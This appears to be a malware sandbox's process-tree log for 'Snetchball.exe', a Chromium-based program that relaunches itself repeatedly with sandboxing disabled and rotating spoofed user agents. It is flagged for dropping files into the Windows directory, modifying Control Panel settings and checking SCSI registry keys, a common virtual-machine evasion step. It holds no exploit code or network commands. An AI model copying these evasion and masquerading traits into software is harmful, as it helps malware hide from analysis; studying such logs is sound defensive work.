C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.122 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3644 --field-trial-handle=2884,i,8473137218192398075,16487166408131028669,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.122 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3652 --field-trial-handle=2884,i,8473137218192398075,16487166408131028669,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 --field-trial-handle=2880,i,14336546605711011291,5422109165545970683,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:219⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2944 --field-trial-handle=2880,i,14336546605711011291,5422109165545970683,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:819⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2984 --field-trial-handle=2880,i,14336546605711011291,5422109165545970683,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:819⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3124 --field-trial-handle=2880,i,14336546605711011291,5422109165545970683,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6286.224 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2800 --field-trial-handle=2848,i,689444666570067090,17619956266482891672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:222⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6286.224 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3060 --field-trial-handle=2848,i,689444666570067090,17619956266482891672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:822⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6286.224 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3064 --field-trial-handle=2848,i,689444666570067090,17619956266482891672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:822⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6286.224 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2448 --field-trial-handle=2848,i,689444666570067090,17619956266482891672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:122⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2784 --field-trial-handle=2788,i,17552115894590141996,15666216598231460867,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:224⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=2788,i,17552115894590141996,15666216598231460867,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:824⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3096 --field-trial-handle=2788,i,17552115894590141996,15666216598231460867,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:824⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=2788,i,17552115894590141996,15666216598231460867,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:124⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 --field-trial-handle=2880,i,18042505807727853842,17488105781846164465,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:227⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2924 --field-trial-handle=2880,i,18042505807727853842,17488105781846164465,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:827⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2944 --field-trial-handle=2880,i,18042505807727853842,17488105781846164465,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:827⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2880,i,18042505807727853842,17488105781846164465,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:127⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"29⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2784 --field-trial-handle=2788,i,18077429005461592365,1572461295042386729,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:230⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3032 --field-trial-handle=2788,i,18077429005461592365,1572461295042386729,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:830⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2788,i,18077429005461592365,1572461295042386729,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:830⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=2788,i,18077429005461592365,1572461295042386729,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:130⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"31⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2752 --field-trial-handle=2756,i,17540745359484800698,1189745792686981842,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:233⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3060 --field-trial-handle=2756,i,17540745359484800698,1189745792686981842,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:833⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3088 --field-trial-handle=2756,i,17540745359484800698,1189745792686981842,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:833⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=2756,i,17540745359484800698,1189745792686981842,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:133⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"35⤵
- Drops file in Windows directory
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2768 --field-trial-handle=2772,i,17106720608748867252,7489709846420813579,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:236⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3032 --field-trial-handle=2772,i,17106720608748867252,7489709846420813579,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:836⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3036 --field-trial-handle=2772,i,17106720608748867252,7489709846420813579,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:836⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=2772,i,17106720608748867252,7489709846420813579,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:136⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3124 --field-trial-handle=2772,i,17106720608748867252,7489709846420813579,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:136⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"37⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
